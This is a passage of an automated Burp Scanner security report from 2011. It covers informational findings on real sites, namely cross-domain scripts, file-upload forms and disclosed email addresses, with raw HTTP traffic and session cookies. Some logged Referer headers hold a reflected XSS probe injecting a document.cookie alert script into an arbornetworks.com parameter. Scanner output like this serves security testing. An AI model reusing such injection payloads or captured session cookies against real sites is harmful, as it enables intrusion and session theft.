Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:42 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=5dLkeuUpIfY; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:42 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:17:42 GMT
Set-Cookie: GEO=6f524a5d4479091d5f7b3cf435ef185ecwsAAAAzR0KtwdbzTUoCNg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFdlVUxwdEZKT2d5N0ZVdk1pcWs2R3ljMzFYRmY0WHlVUnZId25ZWTFTYktR -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflWd9JKd.js"></script>
...[SNIP]...

18. File upload functionality  previous  next
There are 2 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


18.1. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:04 GMT
Expires: Thu, 03 Feb 2011 01:05:04 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=1bec15895da74ab0:TM=1296695104:LM=1296695104:S=GaVtpWsLtBVoNxSV; expires=Sat, 02-Feb-2013 01:05:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

18.2. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:02 GMT
Expires: Thu, 03 Feb 2011 01:05:02 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><input type=file name=file id=file size=40></div>
...[SNIP]...

19. Email addresses disclosed  previous  next
There are 140 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


19.1. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/index.php?option=com_performs&formid=20&Itemid=76889f8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea4569f63444&id=112
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@1@4d4a0466@www.arbornetworks.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 03 Feb 2011 01:27:32 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@2@4d4a0484@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.2. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@a@4d49757a@www.ehow.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 23:36:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@1@4d49ea68@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.3. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/en/contact-us.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@2@4d4a0484@www.arbornetworks.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 03 Feb 2011 01:39:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@3@4d4a074b@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.4. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@1@4d49ea68@www.arbornetworks.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 23:36:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@2@4d49ea72@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.5. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/index.php?option=com_performs&formid=20&Itemid=76889f8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea4569f63444&id=112
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@2@4d49ea72@www.arbornetworks.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 03 Feb 2011 01:27:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@1@4d4a0466@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

19.6. https://arbor.custhelp.com/app/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/home

Issue detail

The following email address was disclosed in the response:

Request

GET /app/home HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:36:24 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUPRnPaTZdkIhBi59G5hvxncx_kJa2b_xWToVCDbB35oFkkjhOfFooBkvU99%7EWw%7ELvUGgTe738XUujxie0uHpb9BuUEUDYMNp1Oh_dJo6Jx%7EIpWz_rHWApAwgIlsVp76eHy6TjF1PoyG%7EnGXSIaeapXcDHDERK56hz; path=/; httponly
RNT-Time: D=190304 t=1296689784733053
RNT-Machine: 01
F5_do_compression: yes
Keep-Alive: timeout=15, max=40
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 22922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<A href="mailto:support@arbor.net">support@arbor.net</A>
...[SNIP]...
<a href="mailto:support@arbor.net">support@arbor.net</a>
...[SNIP]...

19.7. https://arbor.custhelp.com/app/ipreaddress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/ipreaddress

Issue detail

The following email address was disclosed in the response:

Request

GET /app/ipreaddress HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:36 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU4YiZt0HzA%7EV3KX5r1TJz3XkyVV7spmoCXP7Bl0HtJNRb80KnaJwwhvnKgvOLI6sksa%7EMj9Lhj6UyT6M1EJJc2nff5tBBrJ5C6Oc2gE3XdFdL1aLgf6lLTXnUah%7EuEsyspXOwDB8mzueTf1nIZTtYmCgWIgJHyra_; path=/; httponly
Content-Length: 26531
RNT-Time: D=98619 t=1296691416912311
RNT-Machine: 02
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<a href="mailto:support@arbor.net">support@arbor.net</a>
...[SNIP]...

19.8. https://arbor.custhelp.com/app/utils/account_assistance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance

Issue detail

The following email address was disclosed in the response:

Request

GET /app/utils/account_assistance HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:34 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUSf2lTIfZqUhFbsYQsfqk1hHQmNSnWOiMBpzvtqNtH0tK4CI%7EMeW5n_sslngXWMTm1Y09v7ffr8O9l22cVoIBTZHYNX4H_%7Ef3qan5VXGN6_KDNksCFME8_z6dv0lDtf04f6pgA_0%7ENHbiF2pDNKQ9my8hufrUSvYV; path=/; httponly
Content-Length: 25523
RNT-Time: D=109651 t=1296691414433832
RNT-Machine: 04
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<a href="mailto:support@arbor.net">support@arbor.net</a>
...[SNIP]...

19.9. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following email address was disclosed in the response:

Request

GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=aUIUK5KMoF8afUrgJZXdnTjniX2eWSZxWh5wv4GsY1ETUucC0FSvrROU8rzFkSGH8ELvaWUESkFC7%7Ev2PKLcBoiib8DDn%7ET5K79FiThCqZvWeIJzw%7EkKsc0RNJHwnC47I3alT3AmrYr294Neqg0ltc9a3jcYBEfhFtH_DnGuIoUoqAvOf7rsP3oslXQY8lCo467qU8ITfv3vk0rrLEiVzJNz_p8A0Sf_kPsKHlwQO%7EVpVXIOzbcOMScUl8xnVTcCL3VtvckKO5XaK6r%7ELoe8W81%7E5k2bopUsy5_eW9GqqNRQoWbjAXA3_1RnJSytEve0Fd0KnSwcw8di6mpfxHlh4avqlSSRAFAb6m7dwm7faRO3vz2AQezeyleg%21%21

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:36:54 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUxZnUaDGKWGCoJxP2PirvbbIbzUmIrOERHuiwMPolSaNNQ5cWSBy7b95CCTf%7EtuSCpEBZuXUf7%7EtZPVBrPWpNM7rZHcHCqYnykCjhuJL6fvRIYGe3FpYdQkPM8zrOx5T%7Ec%7Eyr1AYLOtosuf4nU%7EMDUq4y6NqCDoHVlbbaOMInEeRIoePUHloWEbXDshncJ5Z5UWIFbjYOkwE1a_LL0sskmWSkMGutyuilas3jpD8oRmb5BPZakyLOKcySGE_k9p_cRDJ0vpesyV5h3GuToJLqQxr4nRTno7kQzoIVZAvdgfBVYLOBxBWRHz0Pjg0IAxWQWY7y6A%7E5Nb9hainTy3e1DV77bhCz0K%7ExhamkwiceXoBM3BLlAxLVEPseGop_RZXNOP5iHV1RdgkXdSyqrVfB6RNvS4eSZqNF; path=/; httponly
RNT-Time: D=123349 t=1296697014631679
RNT-Machine: 03
F5_do_compression: yes
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 25309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<a href="mailto:support@arbor.net">support@arbor.net</a>
...[SNIP]...

19.10. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://arbor.custhelp.com
Path:   /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

Issue detail

The following email address was disclosed in the response:

Request

GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1
Host: arbor.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:03:16 GMT
Server: Apache
P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Cache-Control: max-age=0
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUnG2PM4YlBhARYlemP7Ir7vz_HhKbRP1YLO_iG8sts9DErmpH9oGUWz38ezqOfO6jPPRQothRreGexHLaBcRhH0G6Ip_3g4zPqEOieO2lme9gAmVdWybrtlST1NfjSZpraqJxAqdCUwY2R1aNvTp%7ESnP1RWgZhqb9; path=/; httponly
Content-Length: 25572
RNT-Time: D=150572 t=1296691396102170
RNT-Machine: 02
F5_do_compression: yes
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style
...[SNIP]...
<a href="mailto:support@arbor.net">support@arbor.net</a>
...[SNIP]...

19.11. http://blog.deconcept.com/2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.deconcept.com
Path:   /2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/

Issue detail

The following email address was disclosed in the response:

Request

GET /2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/ HTTP/1.1
Host: blog.deconcept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:38 GMT
Server: Apache
X-Pingback: http://blog.deconcept.com/xmlrpc.php
Link: <http://blog.deconcept.com/?p=111>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href="mailto:geoff@deconcept.com">
...[SNIP]...

19.12. http://blog.deconcept.com/2006/07/28/swfobject-143-released/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.deconcept.com
Path:   /2006/07/28/swfobject-143-released/

Issue detail

The following email address was disclosed in the response:

Request

GET /2006/07/28/swfobject-143-released/ HTTP/1.1
Host: blog.deconcept.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 21:59:38 GMT
Server: Apache
X-Pingback: http://blog.deconcept.com/xmlrpc.php
Link: <http://blog.deconcept.com/?p=139>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<a href='http://mailto:rotten_eye@iol.pt' rel='external nofollow' class='url'>
...[SNIP]...

19.13. http://careers.bankofamerica.com/overview/overview.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://careers.bankofamerica.com
Path:   /overview/overview.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /overview/overview.asp HTTP/1.1
Host: careers.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:01:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40467
Content-Type: text/html
